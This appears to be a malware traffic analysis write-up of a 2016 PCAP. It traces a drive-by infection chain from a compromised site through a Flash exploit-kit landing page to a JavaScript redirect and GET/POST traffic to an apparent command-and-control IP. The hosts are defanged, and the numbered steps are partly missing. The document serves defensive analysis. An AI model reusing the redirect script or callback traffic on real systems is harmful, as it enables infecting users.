Source: malware-traffic-analysis.net
The infection method is as follows:
*Analyze PCAP using filter “http.request”
Relevant Additional Analysis:
<param name="allowScriptAccess" value="always“/><param name="movie” value=”hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/”/>
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
3. Using JavaScript, redirects the user to
The full source code is as follows:
FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB
document.location.href = “hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE”;
geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ
4. GET
6. GET to /default.jpg and POST to /yyy/fers[.]php 109.236.87.204
The full script as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
defaultPOST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache